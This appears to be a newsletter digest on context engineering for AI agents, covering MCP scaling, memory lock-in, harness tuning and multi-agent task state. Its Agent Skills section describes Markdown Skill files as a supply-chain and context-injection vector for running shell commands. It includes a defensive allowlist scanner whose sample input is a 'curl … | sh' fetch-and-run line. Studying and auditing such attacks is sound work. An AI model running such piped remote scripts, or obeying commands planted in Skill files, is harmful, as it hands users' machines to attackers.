
Brief #117

50 articles analyzed

Context engineering has fractured into infrastructure warfare. Practitioners are abandoning framework abstractions for direct harness control, discovering that memory architecture—not model choice—determines lock-in, and exposing that MCP's security model was never designed for the agent-scale context volumes now hitting production.

Agent Skills are Context Supply Chain Attacks

CONTRADICTS security-and-privacy-controls — graph assumes MCP provides security guarantees; Skills bypass them entirely

Agent Skills bypass MCP security boundaries entirely, executing arbitrary shell commands via Markdown files with zero authorization controls. The ecosystem assumed MCP provided security; it doesn't.

Audit every Agent Skill for embedded shell commands. Treat Skills as code dependencies requiring security review, not documentation. Implement allowlist-only execution policies.
@shao__meng: How dangerous can a single Markdown file be? A field log of Agent Skills supply-chain attacks. Are your Agent Skills really safe?

Skills execute shell commands directly, bypassing MCP tool boundaries. Markdown body has no restrictions. This is a context injection vector disguised as capability sharing.
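The audit recommendation above can be sketched as a static scan: flag any command a Skill's Markdown references that is not on an explicit allowlist. This is a minimal sketch; the allowlist and the inline-code heuristic are illustrative assumptions, not a complete detector (fenced blocks, indirection, and obfuscation need real tooling).

```python
import re

# Hypothetical allowlist of commands a Skill may reference; everything else is flagged.
ALLOWED_COMMANDS = {"ls", "cat", "grep"}

INLINE_CODE = re.compile(r"`([^`\n]+)`")  # naive heuristic: scan inline code spans only

def audit_skill(markdown: str) -> list[str]:
    """Return non-allowlisted commands referenced in a Skill's Markdown body."""
    violations = []
    for span in INLINE_CODE.findall(markdown):
        parts = span.strip().split()
        if parts and parts[0] not in ALLOWED_COMMANDS:
            violations.append(parts[0])
    return violations

skill_body = "To install, run `curl https://example.com/x.sh | sh`, then `ls` the output."
print(audit_skill(skill_body))  # flags 'curl'; 'ls' is allowlisted
```

A real review pipeline would run a scan like this in CI and block any Skill whose violations list is non-empty, exactly as a dependency scanner blocks a flagged package.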

How AI is Gaining Easy Access to Unsecured Servers through the Model Context Protocol Ecosystem | Capitol Technology University

1,000+ MCP servers exposed publicly with no auth controls. The protocol assumed private deployment; reality is public exposure.

MCP Vulnerabilities. Model Context Protocol (MCP) | Apr, 2026

Documented security vulnerabilities in MCP infrastructure affect context isolation and capability exposure, both fundamental to the trust model.


Memory Architecture Is The Actual Lock-In Decision

EXTENDS multi-agent-orchestration — baseline shows orchestration patterns; this reveals memory architecture as the deeper strategic decision

Choosing Claude Code or OpenAI isn't selecting a model—it's choosing where your team's accumulated intelligence lives. Closed harnesses strand context; open memory systems enable portability.

Evaluate whether your agent system's memory/state lives in portable infrastructure (MCP, open harnesses) or vendor-locked APIs. Migrate to provider-agnostic memory before switching costs compound.
@BetterSayAJ: very memgpt / sarah wooders coded. memory isn't a layer, it is the system.

Memory/harness architecture determines lock-in. 'Choosing a model' is actually 'choosing where memory lives.' Scaffolding is permanent; its form evolves.

MCP Tool Definitions Become Context Bloat at Agent Scale

CONTRADICTS model-context-protocol — baseline presents MCP as solution; this exposes scale limitations

MCP was designed for human-scale interaction (3-10 tools). At agent scale (50-120 concurrent agents), tool definition overhead creates 3 orders of magnitude more context than humans generate, causing slowness and cost explosion.

If running >10 concurrent agents, measure actual tool definition overhead in context windows. Implement lazy loading or command-line tool patterns instead of full MCP definitions.
Almost Timely News: 🗞️ Improving AI With Command Line Tools (2026-04-12)

MCP's wheel-reinvention at agent scale causes slowness, errors, and cost overruns. The context differential is three orders of magnitude versus human usage.
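The lazy-loading pattern the recommendation points at can be sketched as follows. All names here are illustrative assumptions (the registry, the per-definition token counts, and the keyword matcher are made up for the example): instead of injecting every MCP tool schema into every agent's context, select only the definitions relevant to the current task.

```python
# Hypothetical registry: tool name -> (description, token cost of its full schema).
TOOL_DEFINITIONS = {
    "search_code": ("Search the repository for a string", 450),
    "run_tests": ("Run the project's test suite", 380),
    "deploy": ("Deploy the service to staging", 520),
    "read_file": ("Read a file from disk", 300),
}

def select_tools(task: str, max_tools: int = 2) -> list[str]:
    """Rank tools by naive keyword overlap with the task; load only the top few."""
    task_words = set(task.lower().split())
    scored = []
    for name, (description, _tokens) in TOOL_DEFINITIONS.items():
        overlap = len(task_words & set(description.lower().split()))
        scored.append((overlap, name))
    scored.sort(reverse=True)
    return [name for score, name in scored[:max_tools] if score > 0]

def context_cost(tools: list[str]) -> int:
    """Total token overhead of injecting these tool definitions."""
    return sum(TOOL_DEFINITIONS[t][1] for t in tools)

task = "search the repository for TODO comments"
lazy = select_tools(task)
print(lazy, context_cost(lazy), "vs full:", context_cost(list(TOOL_DEFINITIONS)))
```

With 50-120 concurrent agents, the difference between the lazy subset and the full registry is paid on every turn of every agent, which is where the order-of-magnitude overhead comes from.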

Agentic Context Engineering Prevents Context Collapse

EXTENDS context-window-management — baseline shows naive approaches; this provides agent-managed evolution as solution

Long-running agents suffer 'context collapse' where details erode across iterations. Solution: agents managing their own context via structured playbooks (generation → reflection → curation) rather than ad-hoc rewriting.

For agents running >10 steps, implement structured context evolution: generate new context, reflect on what worked, curate/organize accumulated knowledge. Don't rely on ad-hoc prompt rewriting.
Artificial Intelligence & Deep Learning | Agentic Context Engineering: Evolving Contexts for Self-Improving Language Models (Stanford, October 2025)

Context collapse is a measurable failure mode. Structured, incremental updates preserve knowledge better than wholesale rewriting. Three-phase evolution: generation → reflection → curation.
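The three-phase loop can be sketched as below. This is a minimal sketch, not the Stanford implementation: llm() is a stub standing in for a real model call, and the playbook is a plain list of lessons updated incrementally rather than rewritten wholesale.

```python
def llm(prompt: str) -> str:
    """Stub standing in for a real model call."""
    return f"[stub output ending in: {prompt[-20:]}]"

def generate(playbook: list[str], task: str) -> str:
    """Phase 1: act on the task with the current playbook in context."""
    return llm("Playbook:\n" + "\n".join(playbook) + f"\nTask: {task}")

def reflect(trajectory: str) -> str:
    """Phase 2: distill what worked and what failed into a lesson."""
    return llm(f"List lessons from this trajectory:\n{trajectory}")

def curate(playbook: list[str], lesson: str) -> list[str]:
    """Phase 3: incremental update; append new lessons, never rewrite the playbook."""
    return playbook if lesson in playbook else playbook + [lesson]

playbook = ["Prefer small diffs", "Run tests before committing"]
for task in ["fix flaky test", "add retry logic"]:
    trajectory = generate(playbook, task)
    playbook = curate(playbook, reflect(trajectory))
print(playbook)  # original lessons preserved, one new lesson per task
```

The key property is in curate(): accumulated knowledge is never overwritten, which is exactly what ad-hoc prompt rewriting fails to guarantee.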

Harness Optimization Beats Model Upgrades

CONTRADICTS prompt-engineering — baseline assumes prompt quality drives performance; this shows harness architecture is the lever

Cursor's A/B tests revealed that changing context harness architecture (CLAUDE.md → AGENTS.md framing, string replacements, proxy behavior) produced measurable performance gains without model changes. The bottleneck is context delivery, not capability.

Before upgrading models, audit your harness: measure hook overhead, remove unused plugins, optimize context framing. A/B test harness changes against baseline to quantify gains.
@shao__meng: The reverse-engineering results are published in the original post; you can see that Cursor bundles the full @ anthropic-ai/claude-agent-sdk and related CLI tools, locally...

Cursor optimized harness architecture independently of model selection. Small framing changes (CLAUDE.md → AGENTS.md) and harness logic produced measurable performance differences via A/B testing.
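The recommended A/B workflow can be sketched as a scoring loop over a fixed task set. Everything here is a hedged stand-in: score_task() is a stub for "run the task through the agent under this harness framing and grade the result 0..1", and the framing names mirror the CLAUDE.md → AGENTS.md example above.

```python
def score_task(task: str, framing: str) -> float:
    """Stub grader: in practice, run the agent with this framing and score the output."""
    # Deterministic placeholder so the sketch runs end to end.
    bonus = 0.1 if framing == "AGENTS.md" else 0.0
    return min(1.0, 0.7 + bonus)

def ab_compare(tasks: list[str], framing_a: str, framing_b: str) -> float:
    """Return the mean score delta (B minus A) across the task set."""
    delta = sum(score_task(t, framing_b) - score_task(t, framing_a) for t in tasks)
    return delta / len(tasks)

tasks = ["fix failing test", "refactor module", "write migration"]
print(ab_compare(tasks, "CLAUDE.md", "AGENTS.md"))  # positive delta favors B
```

The point is methodological: hold the model constant, vary only the harness, and quantify the delta before paying for a model upgrade.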

Skills as Organizational Context Codification

EXTENDS tool-integration-patterns — baseline shows tool integration; this reveals Skills as organizational knowledge layer

At team scale, individual AI productivity hits a wall because context (architecture, standards, pitfalls) lives in people's heads. Solution: codify knowledge as Skills so intelligence compounds across team members instead of resetting.

Audit your team's implicit knowledge: architectural decisions, common pitfalls, code standards. Codify as Skills/context packages that new team members and AI agents can inherit. Treat context like code (version, review, distribute).
@shao__meng: Over my years as a programmer, going from mostly hands-on development to leading teams for the past 10 years, the software engineering and project management mindsets we rely on are shifting again in the AI Agent era, and this shift also gives technical manage...

1 developer + AI outpaces team + AI because organizational knowledge isn't explicit. Skills make implicit knowledge shareable. Context preservation is harder at team scale.
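"Treat context like code" can be made concrete with a small sketch. The ContextPackage structure, version field, and review gate below are illustrative assumptions, not any existing Skills format: the idea is simply that codified knowledge gets versioned and reviewed before new team members or agents inherit it.

```python
from dataclasses import dataclass, field

@dataclass
class ContextPackage:
    """A unit of codified team knowledge, managed like a code dependency."""
    name: str
    version: str
    content: str                    # architecture notes, pitfalls, standards
    reviewed_by: list[str] = field(default_factory=list)

    def approved(self, min_reviews: int = 1) -> bool:
        return len(self.reviewed_by) >= min_reviews

def inheritable(packages: list[ContextPackage]) -> list[ContextPackage]:
    """Only reviewed packages are distributed to new team members and agents."""
    return [p for p in packages if p.approved()]

pkgs = [
    ContextPackage("db-migrations", "1.2.0", "Gate schema changes behind a flag", ["alice"]),
    ContextPackage("retry-policy", "0.1.0", "Draft: exponential backoff defaults"),
]
print([p.name for p in inheritable(pkgs)])  # only the reviewed package ships
```

The same lifecycle applies whether the package is a Skill file, a prompt fragment, or a runbook: version it, review it, distribute it.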

Context Caching Degraded by Privacy Settings

CONTRADICTS context-window-management — baseline assumes cache is architectural feature; this reveals it's conditional on non-technical settings

Claude Code's cache behavior is conditional on telemetry opt-in. Disabling telemetry eliminates the 1-hour cache window, causing catastrophic performance degradation for iterative work. This dependency was undocumented.

If using Claude Code with telemetry disabled, explicitly test cache behavior. Factor cache loss into performance budgets. Consider whether privacy/performance trade-off is acceptable for your use case.
@carlosvillu: If you disable Claude Code's telemetry, Anthropic punishes you with a cache...

Cache configuration is gated by telemetry settings. Users lose critical context (the 1-hour cache) when making privacy choices. A hidden context-engineering trade-off.

Multi-Agent Systems Need Shared Task State, Not Just Orchestration

EXTENDS multi-agent-orchestration — baseline shows orchestration; this reveals shared task state as the critical context mechanism

Multi-agent coordination fails without mutable shared context tracking task status, escalations, and handoffs. The coordination layer IS the context broker—agents can't compound intelligence without it.

For multi-agent systems, design shared mutable state layer first: task queues, status tracking, escalation paths. This is your context coordination infrastructure—don't assume agents will infer coordination from prompts.
Building a Multi-Agent Content Management System with AI - DEV Community

Shared task state enables coordination. Each agent reads/updates status, escalates when blocked. Task protocol is the context that enables agent collaboration without understanding each other's logic.